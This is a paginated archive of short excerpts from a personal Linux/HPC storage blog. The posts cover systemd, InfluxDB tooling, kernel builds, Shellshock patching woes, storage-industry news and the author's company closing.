So there I was, trying to use a serial port on a node which was connected to a serial port on a switch. Which I needed to properly configure the switch. So I light up minicom and get garbage. Great, a baud rate mismatch, easily fixed. Fix it. Connect again. I get the first 10-12 characters … and then garbage. Hmmm. I’d like to pause our story for a moment, and say I had the key insight at this moment … but that would not be true.
Posts
Finding unpatched "features" in distro packages
I generally expect baseline distro packages to be “old” by some measure. Even for more forward thinking distros, they generally (mis)equate age with stability. I’ve heard the expression “bug for bug compatible” when dealing with newer code on older systems. Something about the devil you know vs the devil you don’t. Ok. In this case, Cmake. A good development tool, gaining popularity over autotools and other things. Base SIOS image is on Debian 8.
Posts
On expectations
This has happened multiple times over the last few months. Just variations on the theme as it were, so I’ll talk about the theme. The day job builds some of the fastest systems for storage and analytics in market. We pride ourselves on being able to make things go very … very fast. If its slow, IMO, its a bug. So we often get people contacting us with their requirements. These requirements are often very hard for our competitors, and fairly simple for us to address.
Posts
Excellent article on mistakes made for infrastructure ... cloud jail is about right
Article is here at Firstround capital. This goes to a point I’ve made many many times to customers going the cloud route exclusively rather than the internal infrastructure route or hybrid route. Basically it is that the economics simply don’t work. We’ve used a set of models based upon observed customer use cases, and demonstrated this to many folks (customers, VCs, etc.) Many are unimpressed until they actually live the life themselves, have the bills to pay, and then really … really grok what is going on.
Posts
I don't agree with everything he wrote about systemd, but he isn't wrong on a fair amount of it
Systemd has taken the linux world by storm. Replacing 20-ish year old init style processing for a more legitimate control plane, and replacing it with a centralized resource to handle this control. There are many things to like within it, such as the granularity of control. But there are any number of things that are badly broken by default. Actually some of these things are specifically geared towards desktop users (which isn’t a bad thing if you are a desktop linux user, as I am).
Posts
Hows this for a nice deskside system ... one of our Cadence boxen
For a partner. They made a request for something we’ve not built in a while … it had been end of lifed. One of our old Pegasus units. A portable deskside supercomputer. In this case, a deskside franken-computer … built out of the spare parts from other units in our lab. It started out as a 24 core monster, but we had a power supply burn out, and take the motherboard with it.
Posts
Fully RAMdisk booted CentOS 7.2 based SIOS image for #HPC , #bigdata , #storage etc.
This is something we’ve been working on for a while … a completely clean, as baseline a distro as possible, version of our SIOS RAMdisk image using CentOS (and by extension, Red Hat … just need to point to those repositories). And its available to pull down and use as you wish from our download site. Ok, so what does it do? Simple. It boots an entire OS, into RAM. No disks to manage and worry over.
Posts
Raw Unapologetic Firepower: kdb+ from @Kx
While the day job builds (hyperconverged) appliances for big data analytics and storage, our partners build the tools that enable users to work easily with astounding quantities of data, and do so very rapidly, and without a great deal of code. I’ve always been amazed at the raw power in this tool. Think of a concise functional/vector language, coupled tightly to a SQL database. Its not quite an exact description, have a look at Kx’s website for a more accurate one.
Posts
Systemd and non-desktop scenarios
So we’ve been using Debian 8 as the basis of our SIOS v2 system. Debian has a number of very strong features that make it a fantastic basis for developing a platform … for one, it doesn’t have significant negative baggage/technical debt associated with poor design decisions early on in the development of the system as others do. But it has systemd. I’ve been generally non-committal about systemd, as it seemed like it should improve some things, at a fairly minor cost in additional complexity.
Posts
And this was a good idea ... why ?
The Debian/Ubuntu update tool is named “apt” with various utilities built around it. For the most part, it works very well, and software upgrades nicely. Sort of like yum and its ilk, but it pre-dates them. This tool is meant for automated (e.g. lights out) updates. No keyboard interaction should be required. Ever. For any reason. However … a recent update to one particular package, in Debian, and in Ubuntu, has resulted in installation/updates pausing.
Posts
new SIOS feature: compressed ram image for OS
Most people use squashfs which creates a read-only (immutable) boot environment. Nothing wrong with this, but this forces you to have an overlay file system if you want to write. Which complicates things … not to mention when you overwrite too much, and run out of available inodes on the overlayfs. Then your file system becomes “invalid” and Bad-Things-Happen(™). At the day job, we try to run as many of our systems out of ram disks as we can.
Posts
It is 2016 ... why am I fighting with LDAP authentication in linux? Why doesn't it just work?
Ok … very long story that boils down to us trying to help a customer out. I am trying to avoid the “lets just add another user to /etc/passwd” or similar such thing. And they aren’t quite ready to hook into AD or similar. So we have this issue. I want to enable their nodes to use ldap. I’ve done this before for other customers with older tools (pam_ldap, etc.). But it was somewhat crazy (as in non-trivial), involving gnashing of teeth, gums, etc.
Posts
The joys of automated tooling ... or ... catching changes in upstream projects workflows by errors in yours
We have an automated build process for our boot images. It is actually quite good, allowing us to easily integrate many different capabilities with it. These capabilities are usually encapsulated in various software stacks that provide specific functionality. Most of these stacks follow pretty well defined workflows. For a number of reasons, we find building from source generally easier than package installation, as there are often some, well, effectively random (and often poor) choices in build options/file placement in the package builds.
Posts
Not a fan of device mapper in Linux
Yeah, I know. It brings all manner of capabilities with it. Its just the cost of these capabilities, when combined with other tools, like, say, Docker, that make me not want to use it. To wit:
root@ucp-01:~# ls -alF /var/lib/docker/devicemapper/devicemapper/ total 52508 drwx------ 2 root root 80 Jan 29 22:38 ./ drwx------ 4 root root 80 Jan 29 22:38 ../ -rw------- 1 root root 107374182400 Jan 29 22:39 data -rw------- 1 root root 2147483648 Jan 29 22:39 metadata root@ucp-01:~# ls -halF /var/lib/docker/devicemapper/devicemapper/ total 52M drwx------ 2 root root 80 Jan 29 22:38 .
Posts
When infinite resources aren't, and why software assumes they are infinite
We’ve got customers with very large resource machines. And software that sees all those resources and goes “gimme!!!!”. So people run. And then more people use it. And more runs. Until the resources are exhausted. And hilarity (of the bad kind) ensues. These are firedrills. I get an open ticket that “there must be something wrong with the hardware”, when I see all the messages in console logs being pulled in from ICL saying “zOMG I am out of ram ….
Posts
#Perl6 compiler betas are ready
Ok … I am … well … blown away. I had thought Perl6 would be the Duke Nukem forever of programming languages. Indeed, it has been in active development for more than a decade. But you can download compilers (yes, you heard me right, compilers) for it now. You might say “why perl” or “why perl6” or “why now, because we have #insert(language_x) and its wonderful”. Good question, I wasn’t sure why it was relevant, until I started reading some of the code.
Posts
There are no silver bullets, 2015 edition
In Feb 2013, I opined (with some measure of disgust) that people were looking at various software packages as silver bullets, these magical bits of a stack which could suddenly transform massive steaming piles of bits (big … uh … “data” ?) into golden nuggets of actionable data. Many of the “solutions” marketed these days are exactly like that … “add our magic bean software to your pipeline and you will gain insight faster.
Posts
The 1980s called and want their software licensing models back
So here I am, the day before thanksgiving, fighting a battle with a reluctant license server that wants to compute a hash of internal bits on a machine, in order to use to unlock a license key, to let software run. This is not for us, but for a customer. At their site. This is the same model from the 1980s and early 90s. Create a hash from a collection of things (or a dongle you attach to a serial/parallel port).
Posts
A wonderful read on metrics, profiling, benchmarking
Brendan Gregg’s writings are always interesting and informative. I just saw a link on hacker news to a presentation he gave on “Broken Performance Tools”. It is wonderful, and succinctly explains many thing I’ve talked about here and elsewhere, but it goes far beyond what I’ve grumbled over. One of my favorite points in there is slide 83. “Most popular benchmarks are flawed” and a pointer to a paper (easy to google for).
Posts
Shiny #HPC #storage things at #SC15
Assuming everything goes as planned (HA!) we should have a number of very cool things at SC15.
* 100Gb [Unison storage system with BeeGFS](https://scalableinformatics.com/unison) * 100Gb [Unison Ceph](https://scalableinformatics.com/unison) system * 100Gb connection to a partner/customer booth * Forte 100Gb is awesome. The first time I ran an iperf bidirectional test, saw 20GB/s … it blew me away. 40/56GbE is old hat now, and 10GbE is in the rapidly receding past.
Posts
sios-metrics core rewritten
This was a long time coming. Something I needed to do, in order to build a far better code capable of using less network, less CPU power, and providing a better overall system. In short, I ripped out the graphite bits and wrote a native interface to InfluxDB. This interface will also be adapted to kdb+ (32 bit edition), and graphite as time allows. In the process, I cleaned up a tremendous amount of code.
Posts
Updated net-tools bits
So far, 3 components, and working to fix a few things in formatting. On github, grab it here. First, lsbond.pl to report about bond details
root@unison-mgr-1:~/net-tools# ./lsbond.pl bond0: mac 0c:c4:7a:48:69:cb state up mode fault-tolerance (active-backup) xmit_hash layer2 0 active slave eth1 polling 100 ms up_delay 200 ms down_delay 200 ms slave nics: eth1: mac 0c:c4:7a:48:69:cb, link 1, state up, speed 1000, driver igb, version 5.3.2.2 firmware version 1.61,0x8000090e bond1: mac 00:12:c0:80:26:76 state up mode fault-tolerance (active-backup) xmit_hash layer2 0 active slave eth3 polling 100 ms up_delay 200 ms down_delay 200 ms slave nics: eth2: mac 00:12:c0:80:26:76, link 1, state up, speed 10000, driver ixgbe, version 4.
Posts
rebuilding our kernel build system for fun and profit
No, really mostly to clean up an accumulation of technical debt that was really bugging the heck out of me. I like Makefiles and I cannot lie. So I like encoding lots of things in them. But it wound up hardwiring a number of things that shouldn’t have been hardwired. And made the builds brittle. When you have 2 released/supported kernels, and a handful of experimental kernels, it gets hard making changes that will be properly reflected across the set.
Posts
Been there, done that, even have a patent on it
I just saw this about doing a divide and conquer approach to massive scale genomics calculation. While not specific to the code in question, it looked familiar. Yeah, I think I’ve seen something like this before … and wrote the code to do it. It was called SGI GenomeCluster. It was original and innovative at the time, hiding the massively parallel nature of the computation behind a comfortable interface that end users already knew.
Posts
On storage unicorns and their likely survival or implosion
The Register has a great article on storage unicorns. Unicorns are not necessarily mythical creatures in this context, but very high valuation companies that appear to defy “standard” valuation norms, and hold onto their private status longer than those in the past. That is, they aren’t in a rush to IPO or get acquired.
The article goes on to analyze the “storage” unicorns, those in the “storage” field. They admix storage, nosql, hyperconverged, and storage as a service.
Posts
Gmail lossy email system
For months I’ve been noting that email to my 2 different GMail accounts (one for work on the business side using the Google Apps for business, and yes, paid for … and one for personal) are not getting all the emails sent to it. I’ve had customers reach out to me here at this site, as well as calling me up to ask me if I’ve been getting their email. Seems I’m not the only one, though the complaint here appears to be a bad filter and characterizing system.
Posts
diagnostics
This is something of a hard post to write, for a number of reasons, not the least of which is that the topic comes as something of a surprise to me. I am just going to state it, and then discuss it. The vast majority of people (and companies) out there, whom think they know something of hardware/software/system level diagnostics and problem identification (from newbie to “veteran”) are either full of it, or really clueless.
Posts
Interesting Q1 so far for day job
Our Q1 is usually quiet, fairly low key. Not this one. Looks like lots of pent up demand. We are deep into record territory, running 200+% of normal, with possibility of more. Another new wrinkle is that our small investment round is mostly complete. This is new territory for us, and you may have noticed I’d backed off posting intensity over the last half year or so while this was going on.
Posts
influxdb cli queries now with regex
This is the way queries are supposed to work. Note the perl regex in the series name
unison> select * from /^usn-ramboot.nettotals.kb(in|out)$/ limit 10 D[23261] Scalable::TSDB::_generate_url; dbquery = 'select * from /^usn-ramboot.nettotals.kb(in|out)$/ limit 10' D[23261] Scalable::TSDB::_generate_url; query = 'p=XXXXXXXX&u;=scalable&chunked;=1&time;_precision=s&q;=select%20%2A%20from%20%2F%5Eusn-ramboot.nettotals.kb%28in%7Cout%29%24%2F%20limit%2010' D[23261] Scalable::TSDB::_generate_url; url = 'http://localhost:8086/db/unison/series?p=XXXXXXX&u;=scalable&chunked;=1&time;_precision=s&q;=select%20%2A%20from%20%2F%5Eusn-ramboot.nettotals.kb%28in%7Cout%29%24%2F%20limit%2010' D[23261] Scalable::TSDB::_send_chunked_get_query -> reading 0.009837s D[23261] Scalable::TSDB::_send_chunked_get_query -> bytes_received = 530B D[23261] Scalable::TSDB::_send_chunked_get_query return code = 200 D[23261] Scalable::TSDB::_send_chunked_get_query cols = [time,sequence_number,usn-ramboot.nettotals.kbin] D[23261] Scalable::TSDB::_send_chunked_get_query cols = [time,sequence_number,usn-ramboot.
Posts
InfluxDB cli ready for people to play with
The code is on github. Installation should be simple sudo make INSTALLPATH=/path/where/you/want/it It will install any needed Perl modules for you. I’ve reduced the dependency set to LWP::UserAgent, Getopt::Lucid, JSON::PP, and some text processing. As much as I like Mojolicious, the UserAgent was 1/10th the speed of LWP for the same work. Once it is done, point it over to an InfluxDB database instance:
landman@metal:~/work/development/influxdbcli$ ./influxdb-cli.pl --user scalable --pass XXXXXXX --host 192.
Posts
Real measurement is hard
I had hinted at this last week, so I figure I better finish working on this and get it posted already. The previous bit with language choice wakeup was about the cost of Foreign Function Interfaces, and how well they were implemented. For many years I had honestly not looked as closely at Python as I should have. I’ve done some work in it, but Perl has been my go-to language.
Posts
When the revolution hits in force ...
Our machines will be there, helping power the genomics pipelines to tremendous performance. Performance is an enabling feature. Without it you cannot even begin to hope to perform massive scale analytics. With it, you can dream impossible dreams. This article came out talking about a massive performance analytics pipeline at Nationwide Children’s Hospital in Ohio. This pipeline runs on a cluster attached to Scalable Informatics FastPath Unison storage. This is a very dense, very fast system, interconnected with Mellanox FDR Infiniband, Chelsio 40GbE, and leveraging BeeGFS from thinkparq.
Posts
Where have you been all my life FFI::Platypus?
Oh my … this is goodness I’ve been missing badly in Perl. Just learned about it this morning. Short version. You want to mix programming languages for implementation of some project. One language makes development of some subset of functions very easy, while another language handles another part very well. You need some sort of layer to handle this usually, or a way to sanely map. FFI is the concept behind this … and while there is no mention of CORBA or XDR/RPC type things, this is the logical follow-on to these (in their time) ground breaking technologies.
Posts
Finally, a desktop Linux that just works
I’ve been a user of Linux on the desktop, as my primary desktop, for the last 16 years. In that time, I’ve had laptops with Windows flavors (95, XP, 2000, 7), a MacOSX desktop. Before that, my first laptop I had bought (while working on my thesis) was a triple boot job, with DOS, Windows 9x, and OS2. I used the latter for when I was traveling and needed to write; the thesis was written in LaTeX and I could easily move everything back and forth between that and my Indy at home, and my office Indigo.
Posts
Anatomy of a #fail ... the internet of broken software stacks
So I’ve been trying to diagnose a problem with my Android devices running out their batteries very quickly. And at the same time, I’ve been trying to understand why my address bar on Thunderbird has taken a very long time to respond. I had made a connection earlier today when I had noticed the 50k+ contacts in my contact list, of which maybe 2000 were unique. I didn’t quite understand it.
Posts
Drivers developed largely out of kernel, and infrequently synced
One of the other aspects of what we’ve been doing has been forward porting drivers into newer kernels, fixing the occasional bug, and often rewriting portions to correct interface changes. I’ve found that subsystem vendors seem to prefer to drop code into the kernel very infrequently. Sometimes once every few years are they synced. Which leads to distro kernels having often terribly broken device support. And often very unstable device support.
Posts
Parallel building debian kernels ... and why its not working ... and how to make it work
So we build our own kernels. No great surprise, as we put our own patches in, our own drivers, etc. We have a nice build environment for RPMs and .debs. It works, quite well. Same source, same patches, same make file driving everything. We get shiny new and happy kernels out the back end, ready for regression/performance/stability testing. Works really well. But … but … parallel builds (e.g. leveraging more than 1 CPU) work only for the RPM builds.
Posts
Amusing #fail
I use Mozilla’s thunderbird mail client. For all its faults, it is still the best cross platform email system around. Apple’s mail client is a bad joke and only runs on apple devices (go figure). Linux’s many offerings are open source, portable, and most don’t run well on my Mac laptop. I no longer use Windows apart from running in a VirtualBox environment. And I would never go back to OutLook anyway (used it once, 15 years ago or so … never again).
Posts
Systemd, and the future of Linux init processing
An interesting thing happened over the last few months and years. Systemd, a replacement init process for Linux, gained more adherents, and supplanted the older style init.d/rc scripting in use by many distributions. Ubuntu famously abandoned init.d style processing in favor of upstart and others in the past, and has been rolling over to systemd. Red Hat rolled over to Systemd. As have a number of others. Including, surprisingly, Debian. For those whom don’t know what this is, think of it this way.
Posts
Brings a smile to my face
My soon to be 15 year old daughter was engrossed with something on her laptop yesterday. Thinking it was fan-fiction, I asked her what she was writing. She knitted her brow for a moment, and looked up. “Its code combat Dad.” she said, quite matter of factly. I must have had a slightly startled expression on my face. I knew she had dabbled with it, and had recommended (/sigh) Python as a language, after she took (and aced) a Java class last year, as Python is inherently simpler.
Posts
Starting to come around to the idea that swap in any form, is evil
Here’s the basic theory behind swap space. Memory is expensive, disk is cheap. Only use the faster memory for active things, and aggressively swap out the less used things. This provides a virtual address space larger than physical/logical memory. Great, right? No. Heres why.
swap makes the assumption that you can always write/read to persistent memory (disk/swap). It never assumes persistent memory could have a failure. Hence, if some amount of paged data on disk suddenly disappeared, well … Put another way, it increases your failure likelihood, by involving components with higher probability of failure into a pathway which assumes no failure.
Posts
Mixing programming languages for fun and profit
I’ve been looking for a simple HTML5-ish way to represent our disk drives in our Unison units. I’ve been looking for some simple drawing libraries in javascript to make this higher level, so I don’t have to handle all the low level HTML5 bits. I played with Raphael and a few others (including paper.js). I wound up implementing something in Raphael.
The code that generated this was a little unwieldly … as javascript doesn’t quite have all the constructs one might expect from a modern language.
Posts
And the 0.8.3 InfluxDB no longer works with the InfluxDB perl module
I ran into this a few weeks ago, and am just getting around to debugging it now. Traced the code, set up a debugger and followed the path of execution, and … and … Yup, its borked. So, I can submit a patch or 3 against the InfluxDB code, or roll a simpler more general Time Series Data Base interface that will talk to InfluxDB. And eventually kdb+. Since I wanted to code for that as well, I am looking more seriously at the second option.
Posts
Shellshock is worse than heartbleed
In part because, well, the patches don’t seem to cover all the exploits. For the gory details, look at the CVE list here. Then cut and paste the local exploits. Even with the latest patched source, built from scratch, there are active working compromises. With heartbleed, all we had to do was nuke keys, patch/update packages, restart machines, cross fingers. This is worse, in that the fixes … well … don’t.
Posts
Updated boot tech in Scalable OS (SIOS)
This has been an itch we’ve been working on scratching a few different ways, and its very much related to forgoing distro based installers. Ok, first the back story. One of the things that has always annoyed me about installing systems has been the fundamental fragility of the OS drive. It doesn’t matter if its RAIDed in hardware/software. Its a pathway that can fail. And when it fails, all hell breaks loose.
Posts
Solved the major socket bug ... and it was a layer 8 problem
I’d like to offer an excuse. But I can’t. It was one single missing newline. Just one. Missing. Newline. I changed my config file to use port 10000. I set up an nc listener on the remote host.
nc -k -l a.b.c.d 10000 Then I invoked the code. And the data showed up. Without a ()&(&%&$%*&(^ newline. That couldn’t possibly be it. Could it? No. Its way to freaking simple.
Posts
New monitoring tool, and a very subtle bug
I’ve been working on coding up some additional monitoring capability, and had an idea a long time ago for a very general monitoring concept. Nothing terribly original, not quite nagios, but something easier to use/deploy. Finally I decided to work on it today. The monitoring code talks to a graphite backend. Could talk to statsd, or other things. In this case, we are using the InfluxDB plugin for graphite. I wanted an insanely simple local data collector.
Posts
InfluxDB cli is up on github
I know there is a node version, and I did try it before I wrote my own. Actually, the reason I wrote my own was that I tried it and … well … Link is here. And yes, the readme is borked about 1/2 way through. Doesn’t quite show the formatting of the output quite right. Will try to fix over the weekend, as I move this a far more feature complete bit.
Posts
Have a nice cli for InfluxDB
I tried the nodejs version and … well … it was horrible. Basic things didn’t work. Made life very annoying. So, being a good engineering type, I wrote my own. It will be up on our site soon. Here’s an example
./influxdb-cli.pl --host 192.168.5.117 --user test --pass test --db metrics metrics> \list series
.----------------------------------. | series name | +----------------------------------+ | lightning.cpuload.avg1 | | lightning.cputotals.idle | | lightning.cputotals.irq | | lightning.
Posts
Be on the lookout for 'pauses' in CentOS/RHEL 6.5 on Sandy Bridge
Probably on Ivy Bridge as well. Short version. The pauses that plagued Nehalem and Westmere are baaaack. In RHEL/CentOS 6.5 anyway. A customer just ran into one. We helped diagnose/work around this a few years ago when a hedge fund customer ran into this … then a post-production shop … then … Basically the problem came in from the C-states. The deeper the sleep state, in some instances, the processor would not come out of it, or get stuck in the lower levels.
Posts
Doing what we are passionate about
I am lucky. I fully admit this. There are people out there whom will tell you that its pure skill that they have been in business and been successful for a long time. Others will admit luck is part of it, but will again, pat themselves on the back for their intestinal fortitude. Few will say “I am lucky”. Which is a shame, as luck, timing (which you can never really, truly, control), and any number of other factors really are critical to one being able to have the luxury of doing what we are doing.
Posts
You can tell you are a little nuts if ...
… you get really annoyed at the performance of grep on file IO (seriously folks? 32k or page size sized IO? What is this … 1992?) so you rewrite it in 20 minute in Perl, and increase the performance by 5-8x or so. If I get angry enough, I might just go all out, use direct IO, multiple parallel readers, and some other bits. I’ve got these huge disk pipes, awesome bandwidths, and this tiny little filter tool.
Posts
how not to write driver Makefiles or configuration scripts
if [uname -r eq ...] Its very bad form to insist on very particular versions of an OS/kernel. Not only will you piss off your customer (me), you will cause a great deal of effort to unwind the ill-considered test in order to get even basic functionality. I’ve seen this on network cards, RAID cards, you name it. It increases your support load, decreases the likelihood that you can actually support whats out there … say for example, someone does a ‘yum update’ and gets an updated kernel.
Posts
Update on IPMI Console Logger
Config now comes from some nice and simple json, and it handles multiple machines with aplomb. See the git repository for the latest. The config file example is in there, and you can replicate the n01-ipmi section with more nodes trivially. Coming next is getting config from a trusted web server, along with registering the client to the trusted web server. This prevents things like passwords from showing up in the clear, though you can always create a lower privileged user to access the console for monitoring.
Posts
Playing with AVX
I finally took some time from a busy schedule to play with AVX. I took my trusty old rzf code (Riemann Zeta function) and rewrote the time expensive inner loop in AVX primatives hooked to my C code. As a reminder, this code is a very simple sum reduction, and can be trivially parallelized (sum reduction). Vectorization isn’t as straightforward, and I found that compiler auto-vectorization doesn’t work well for it.
Posts
started playing with SmartOS for the day job
This is a very cool concept, something that meshes perfectly with our Tiburon based siCluster philosophy. That is, compute nodes should boot diskless, there should be very little state on each node, and stuff that you need to do should be made absolutely as simple as possible. SmartOS is a project of Joyent. Joyent, for those not familiar with them, are a cloud company, building a nice public cloud for end users to build on.
Posts
Fun with primes
A long time ago, in a galaxy far … far … away … I’ve been playing with primes for a while … computing them, etc. Have a neat way to represent any natural number (exluding 0) in terms of the exponents of their prime factors. Lots of reasons for playing with this. Started doing this before joining SGI … many moons ago, and used it as a way to entertain myself on airplanes when the laptop battery ran out.
Posts
I know I shouldn't be ... but I am ...
[update] a bug in my reasoning (thanks Peter!) a Perl Golf addict. Not a recovering addict, but one that is active. What is Perl Golf? Well, as in real golf, you try to provide the minimal number of steps to a solution. In this case, you are to solve the specific puzzle. Detractors of Perl often make snarky comments about Perl’s equivalency to random line noise and other such nonesense. Sure … if it makes you feel good to say that … I am a fan of terse languages, I wrote programs (if you could call them that) in APL … a while ago.
Posts
Guide to getting OFED 1.2 to build on OpenSuSE
Grab the tarball from the open fabrics alliance (or from here)
Grab the build_new.sh from here, place it in the OFED-1.2 directory as root on your machine mv /usr/src/linux-2.6.18.2-34/include/linux/miscdevice.h /usr/src/linux-2.6.18.2-34/include/linux/miscdevice.h.original ln -s /usr/include/linux/miscdevice.h /usr/src/linux-2.6.18.2-34/include/linux/miscdevice.h Then run the build_new.sh. Voila. Works. Binary RPMs are here.
Posts
Is OpenSolaris Open?
As seen on /. IBM is questioning whether or not it is really open.
I think the real question is, does it matter? I really don’t see a need for it. The market is positively crowded with OpenSouce Linux, *BSD. OpenSource should not be a repository for declining projects. From an ISV perspective, you have to ask “why”? Precisely what benefit in terms of lower costs and increased revenue does being on Solaris bring?
Posts
New programming workshop: Perl and R for Informatics
The good folks over at BioInformatics.org have a new workshop ready to go on programming in [Perl and R. See this link for more details. If there is interest in having this outside of Boston, please let me know.
Posts
The marketing of computer languages
I have noticed a tendency for technologists, programmers, and others to fall in love with their projects, their tools, … . Why this happens, I am not sure. I don’t love my hammer, my circular saw, my computers, the languages I use. They are tools. They are the means to a goal. Sure, I like some tools more than others, but I am also not going to waste my time misusing a tool for a purpose ill suited for it.
Category: storage
Posts
Wordpress is recovering (was very sick)
Please note: Wordpress appears to be failing badly at this stage. I’ll be working on a fix this week, and likely will create a new site out of different, less buggy code. I’ve checked the DB, moved it to a different machine, restored from a known working backup. It appears a recent update of WP managed to completely screw up post handling. I disabled all plugins, ran health checks, etc. I’ve cleaned cookies, browsing history, used different browsers on different machines, with exactly the same outcome.
Posts
How to handle curious conversations ... part 1 of a few billion
So … Suppose someone comes up to you and makes a claim. This claim isn’t backed by facts, merely by unicorns, rainbows, and their own biases. Yeah, this kind of relates to the previous post. They argue based upon the claim. Stake out their ground. Insist that “none shall pass” in a black knight, Monty Python esq manner. But they are wrong. Simply, factually wrong. Regardless of their biases, you and many others have been demonstrating the very thing that is claimed to be impossible, to customers for years.
Posts
Distribution package dependency radii, or why distros may be doomed
I am a sucker for a good editor. I like atom. Don’t yell at me. Its pretty good for my use cases. It has lots of nice extensions I can and have used. Atom is not without its dependencies though. Installing it, which should be relatively simple, turns out to be … well … interesting.
[root@centos7build nyble]# rpm -ivh ~/atom.x86_64.rpm error: Failed dependencies: libXss.so.1()(64bit) is needed by atom-1.26.0-0.1.x86_64 In searching the interwebs for what Xss is, I happened across this little tidbit
Posts
NyBLE
So there I am updating my new repository to enable using zfs in the ramboot images. This is a simplification and continuation of the previous work I did a few years ago, with some massive code cleanups. And sadly, no documentation yet. Will fix soon, but for now, I am trying to hit the major functionality points. NyBLE is a linux environment for hypervisor hosts. It builds on the old open source SIOS work, and extends it in significant ways.
Posts
Dealing with disappointment
In the last few years, I’ve had major disappointments professionally. The collapse of Scalable, some of the positively ridiculous things associated with the aftermath of that, none of which I’ve written about until they are over. Almost over, but not quite. Waiting for confirmation. My job search last year, and some of the disappointment associated with that. Recently I’ve had different type of disappointments, without getting into details. The way I’ve dealt with these things in the past has been to try to understand if there was a conflict, what could I have done better.
Posts
Late Feb 2018 update
Again, many apologies over the low posting frequency. Several things that are nearing completion (hopefully soon) that I want finalized first. That said, the major news is that this site is now on a much improved server and network. I’ve switched from Comcast Business to WOW business. So far, much better speed, more consistent performance, far lower cost per bandwidth. I do have lots to write about, and have been saving things up until after this particular objective is met, so I can work/write distraction free.
Posts
Apologies on the slow posting rate
Many things are going on simultaneously right now, and I have little time to compose thoughts for the blog. I anticipate a bit of a letup in the next week or two as the year comes to a close.
Posts
Cool bug on upgrade (not)
Wordpress is an interesting beast. Spent hours working through issues that I shouldn’t have needed to on an upgrade, as some functions were deprecated. In an interesting way. By removing them, and throwing an error. Which I found only through looking at a specific log. So out goes that plugin. And the site is back.
Posts
#SC17
I’ve had numerous requests from friends and colleagues about whether I will be attending #SC17 this year. Sadly, this is not to be the case. $dayjob has me attending an onsite meeting that week in San Francisco, and the schedule was such that I could not attend the talks I was interested in. I’d love for there to be a way to listen to the talks remotely. Maybe I’ll simply buy the DVD/USB stick of the talks if there is an online store for them.
Posts
A completed project: mysqldump file to CSV converter
This was part of something else I’d worked on, but it never saw the light of day for a number of (rather silly) reasons. So rather than let these bits go to waste, I created a github repo for posterity. Someone might be able to make effective use of them somewhere. Repo is located here: https://github.com/joelandman/msd2csv Pretty simple code, does most of the work in-memory, and multiple regex passes to transform and clean up the CSV.
Posts
Cray "acquires" ClusterStor business unit from Seagate
Information at this link. It is being called a “strategic transaction”, though it likely came about vis-a-vis Seagate doing some profound and deep thinking over what business it was in. Seagate has been weathering a storm, and has been working on re-orgs to deal with a declining disk market. They acquired ClusterStor as part of a preceding transaction of Xyratex. Xyratex was the basis for the Cray storage platforms (post Enginio).
Posts
The birthday problem (allocation collisions) for networks and MAC addresses
The birthday problem is a fairly simple to state situation. There is at least a 50% probability (e.g. even chance) that at least 2 of 23 randomly chosen people in a room have the same birthday. This comes from some elementary applications of statistics, and is documented on Wikipedia. While we care less about networks celebrating their annual journey around Sol, we care more about potential address collisions for statically assigned IP addresses.
Posts
Now for your bidding pleasure, the contents of one company
This is an on-going process I won’t comment on, other than to provide a link to the bidding site. There are numerous cool items in there.
Lot 2-57207: a 64 bay siFlash/Cadence machine with 64x 400GB SAS SSDs. Fully operational, SSDs very lightly used, extraordinarily fast unit. Lot 2-57215: 2 mac minis (one was my desktop unit) Lot 2-57216: My old Macbook pro, 750 GB SSD, 16 GB ram, NVidia gfx Lot 2-57081: Mac pro tower unit Lot 2-57232: a bunch of awesome monitors Lot 2-57222: Mini 24U rack with PDUs Lot 2-57015: Supermicro Twin 2U system (5 others just like it) Lot 2-57100: a 40 core 256GB testbed machine And many other computer systems, parts, etc.
Posts
One door has closed, another has opened
As I had written previously, my old company, Scalable Informatics, has closed. Read that posting to see why and how, but as with all things … we must move forward. It is cliche' to use the title phrase. But it is also true. We know the door that closed. It’s the door that has opened afterwards that I am focusing upon. I have joined Joyent to work on, as it turns out, many similar things to what I did at Scalable.
Posts
Hard disk shipments dropped 10% QoQ, 2% YoY
This jives very well with what I’ve observed. Decreasing demand for enterprise storage hard disks, or as I call them “Spinning Rust Drives” (or SRD) as compared with SSD (Solid State Drives). The summary is here with a key quote being
Again, jives well with what I’ve observed. Mellanox has a good take on its blog, noting that
This is a critical point. While SRD are dropping in volume, there is not enough SSD fab capacity to supply the market demand.
Posts
I always love these breathless stories of great speed, and how VCs love them ...
Though, when I look at the “great speed”, it is often on par with or less than Scalable Informatics sustained years before. From 2013 SC13 show, on the show floor, after blasting through a POC at unheard of speed, and setting long standing records in the STAC-M3 benchmarks …
Article in question is in the Register. Some of the speeds and feeds:
* 200 microsecs latency * 45GBps read bandwidth * 15GBps write bandwidth * 7 million IOPS But then … a fibre connection.
Posts
Requiem
This is the post an entrepreneur hopes to never write. They pour their energy, their time, their resources, their love into their baby. Trying to make her live, trying to make her grow. And for a while, she seems to. Everything is hitting the right way, 12+ years of uninterrupted growth and profitable operation as an entirely bootstrapped company. Market leading … no … dominating … from the metrics customers tell you are important … position.
Posts
Best comment I've seen in a bug report about a tool
So … gnome-terminal has been my standard cli interface on linux GUIs for a while. I can’t bring myself to use KDE for any number of reasons. Gnome itself went in strange directions, so I’ve been using Cinnamon atop Mint and Debian 8. Ok, Debian 8. Gnome-terminal. Some things missing when you right mouse button click. Like “open new tab”. Open new window is there. This works. But no tab entry.
Posts
structure by indentation ... grrrr ....
If you have to do this:
:%s/\t/ /g in order to get a very simple function to compile because of this error
File "./snd.py", line 13 return sum ^ IndentationError: unindent does not match any outer indentation level even though your editor (atom!!!!??!?!) wasn’t showing you these mixed tabs and spaces … Yeah, there is something profoundly wrong with the approach. The function in question was all of 10 lines.
Posts
What is old, is new again
Way back in the pre-history of the internet (really DARPA-net/BITNET days), while dinosaur programming languages frolicked freely on servers with “modern” programming systems and data sets, there was a push to go from a static linking programs to a more modular dynamic linking. The thought processes were that it would save precious memory, not having many copies of libc statically linked in to binaries. It would reduce file sizes, as most of your code would be in libraries.
Posts
Another article about the supply crisis hitting #SSD, #flash, #NVMe, #HPC #storage in general
I’ve been trying to help Scalable Informatics customers understand these market realities for a while. Unfortunately, to my discredit, I’ve not been very successful at doing so … and many groups seem to assume supply is plentiful and cheap across all storage modalities. Not true. And not likely true for at least the rest of the year, if not longer. This article goes into some depth that I’ve tried to explain to others in phone conversations, private email threads.
Posts
A nice shout out in ComputerWeekly.com about @scalableinfo #HPC #storage
See the article here.
